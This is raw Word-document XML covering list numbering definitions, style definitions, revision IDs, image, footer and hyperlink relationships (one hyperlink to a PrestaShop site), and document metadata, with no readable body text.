    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C95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0C98"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="823E14F6"/>
    <w:lvl w:ilvl="0" w:tplc="C75CBFF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DF5126"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7682C28C"/>
    <w:lvl w:ilvl="0" w:tplc="0AE0B564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1" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="4009001B" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="2381" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="4009000F" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3101" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="40090019" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3821" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="4009001B" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="4541" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="4009000F" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5261" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="40090019" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5981" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="40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>
    <w:nsid w:val="47EA19C0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DF486F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E0DD1"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DD106BBA"/>
    <w:lvl w:ilvl="0" w:tplc="3DD473F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1" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="4009001B" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="2021" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="4009000F" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2741" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="40090019" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3461" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="4009001B" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="4181" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="4009000F" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4901" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="40090019" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5621" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="40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2">
    <w:nsid w:val="4F9A7AA9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="64E4E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7775A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E14E20CE"/>
    <w:lvl w:ilvl="0" w:tplc="D42C5352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1" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="4009001B" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="2021" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="4009000F" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2741" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="40090019" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3461" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="4009001B" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="4181" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="4009000F" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4901" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="40090019" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5621" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="40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>
    <w:nsid w:val="64832F2B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="64E4E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91EA5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D1F40A06"/>
    <w:lvl w:ilvl="0" w:tplc="0AE0B564">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="94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661" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="4009001B" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="2381" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="4009000F" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3101" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="40090019" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3821" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="4009001B" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="4541" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="4009000F" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5261" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="40090019" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5981" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="40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6">
    <w:nsid w:val="6B475B54"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FAFAF14A"/>
    <w:lvl w:ilvl="0" w:tplc="15106A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AC06AD"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="820EDB62"/>
    <w:lvl w:ilvl="0" w:tplc="CD8024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90A4C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BB2034B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7F39038D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D5C44C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8"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="17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10"/>
  </w:num>
  <w:num w:numId="18">
    <w:abstractNumId w:val="0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00"/>
    <w:rsid w:val="00030BD3"/>
    <w:rsid w:val="000527F0"/>
    <w:rsid w:val="0006143F"/>
    <w:rsid w:val="000A4069"/>
    <w:rsid w:val="000E328C"/>
    <w:rsid w:val="000F00A0"/>
    <w:rsid w:val="000F17B3"/>
    <w:rsid w:val="000F3FF2"/>
    <w:rsid w:val="0015039B"/>
    <w:rsid w:val="00151C86"/>
    <w:rsid w:val="00197DA7"/>
    <w:rsid w:val="00200209"/>
    <w:rsid w:val="0020409E"/>
    <w:rsid w:val="00210ACB"/>
    <w:rsid w:val="002218A6"/>
    <w:rsid w:val="00224C7B"/>
    <w:rsid w:val="0022739E"/>
    <w:rsid w:val="002350CB"/>
    <w:rsid w:val="00270986"/>
    <w:rsid w:val="00291626"/>
    <w:rsid w:val="00296621"/>
    <w:rsid w:val="002E6941"/>
    <w:rsid w:val="0035180C"/>
    <w:rsid w:val="00360A42"/>
    <w:rsid w:val="00360D10"/>
    <w:rsid w:val="00363221"/>
    <w:rsid w:val="00390B00"/>
    <w:rsid w:val="00392988"/>
    <w:rsid w:val="00392C9A"/>
    <w:rsid w:val="003D03C4"/>
    <w:rsid w:val="00401CBD"/>
    <w:rsid w:val="00404938"/>
    <w:rsid w:val="00466BEB"/>
    <w:rsid w:val="004878C1"/>
    <w:rsid w:val="004B1B81"/>
    <w:rsid w:val="004B3E99"/>
    <w:rsid w:val="004B6D10"/>
    <w:rsid w:val="004C3EDF"/>
    <w:rsid w:val="004F0EC2"/>
    <w:rsid w:val="004F2A1E"/>
    <w:rsid w:val="00541342"/>
    <w:rsid w:val="00571599"/>
    <w:rsid w:val="005A7397"/>
    <w:rsid w:val="005B6F48"/>
    <w:rsid w:val="005F07E8"/>
    <w:rsid w:val="006748EE"/>
    <w:rsid w:val="006966BD"/>
    <w:rsid w:val="00711EFA"/>
    <w:rsid w:val="00757B76"/>
    <w:rsid w:val="00780195"/>
    <w:rsid w:val="007945D0"/>
    <w:rsid w:val="007A11B5"/>
    <w:rsid w:val="007A19F9"/>
    <w:rsid w:val="007A6381"/>
    <w:rsid w:val="008577E0"/>
    <w:rsid w:val="008E066F"/>
    <w:rsid w:val="008E5DFD"/>
    <w:rsid w:val="008E6C50"/>
    <w:rsid w:val="008F220A"/>
    <w:rsid w:val="00947564"/>
    <w:rsid w:val="009A05B7"/>
    <w:rsid w:val="009E3405"/>
    <w:rsid w:val="009E57B5"/>
    <w:rsid w:val="00A01965"/>
    <w:rsid w:val="00A1459A"/>
    <w:rsid w:val="00A354D1"/>
    <w:rsid w:val="00A4412E"/>
    <w:rsid w:val="00A735D3"/>
    <w:rsid w:val="00A913FB"/>
    <w:rsid w:val="00AB4449"/>
    <w:rsid w:val="00AC79F2"/>
    <w:rsid w:val="00AE4681"/>
    <w:rsid w:val="00AE4A5C"/>
    <w:rsid w:val="00B11EA4"/>
    <w:rsid w:val="00B25D7B"/>
    <w:rsid w:val="00B95B7F"/>
    <w:rsid w:val="00C30C54"/>
    <w:rsid w:val="00C42873"/>
    <w:rsid w:val="00C564BF"/>
    <w:rsid w:val="00C72C38"/>
    <w:rsid w:val="00C94E44"/>
    <w:rsid w:val="00C96185"/>
    <w:rsid w:val="00C965E5"/>
    <w:rsid w:val="00CD2C75"/>
    <w:rsid w:val="00CF4123"/>
    <w:rsid w:val="00D4195F"/>
    <w:rsid w:val="00D52D70"/>
    <w:rsid w:val="00D569E9"/>
    <w:rsid w:val="00D72989"/>
    <w:rsid w:val="00D748F9"/>
    <w:rsid w:val="00DC27EC"/>
    <w:rsid w:val="00DD0B93"/>
    <w:rsid w:val="00DD1B6A"/>
    <w:rsid w:val="00DE122E"/>
    <w:rsid w:val="00DE1B96"/>
    <w:rsid w:val="00E141B2"/>
    <w:rsid w:val="00E2341D"/>
    <w:rsid w:val="00E54A23"/>
    <w:rsid w:val="00E5519C"/>
    <w:rsid w:val="00E60381"/>
    <w:rsid w:val="00E643D1"/>
    <w:rsid w:val="00E81448"/>
    <w:rsid w:val="00EB1B7C"/>
    <w:rsid w:val="00ED1477"/>
    <w:rsid w:val="00F1255A"/>
    <w:rsid w:val="00F4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43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3D1"/>
    <w:pPr>
      <w:ind w:left="3322" w:right="350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643D1"/>
    <w:pPr>
      <w:ind w:left="221" w:right="3507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3D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43D1"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="TableParagraph">
    <w:name w:val="Table Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="00E643D1"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Header">
    <w:name w:val="header"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HeaderChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00AE4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A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4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A5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43ECE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47564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4756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F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878C1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E1B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A6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43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3D1"/>
    <w:pPr>
      <w:ind w:left="3322" w:right="350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643D1"/>
    <w:pPr>
      <w:ind w:left="221" w:right="3507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3D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43D1"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="TableParagraph">
    <w:name w:val="Table Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="00E643D1"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Header">
    <w:name w:val="header"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HeaderChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00AE4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A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4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A5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43ECE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47564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4756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F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878C1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E1B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A6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jpeg"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image47.jpe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hyperlink" Target="mailto:admin@google.com" TargetMode="External"/><Relationship Id="rId74" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image57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footer" Target="footer5.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19.png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openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer3.xml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estashop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4.png"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image41.jpe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hyperlink" Target="http://www.prestashop.com/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image" Target="media/image44.jpeg"/><Relationship Id="rId67" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image50.png"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.jpe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36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image23.jpeg"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image35.png"/><Relationship Id="rId57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3156-EAA4-426F-BDB1-05167713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38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Lahoti</dc:creator>
  <cp:lastModifiedBy>admin</cp:lastModifiedBy>
  <cp:revision>19</cp:revision>
  <cp:lastPrinted>2018-01-03T18:53:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-02-11T02:59:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-01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5T00:00:00Z</vt:filetime>
  </property>
</Properties>
</file>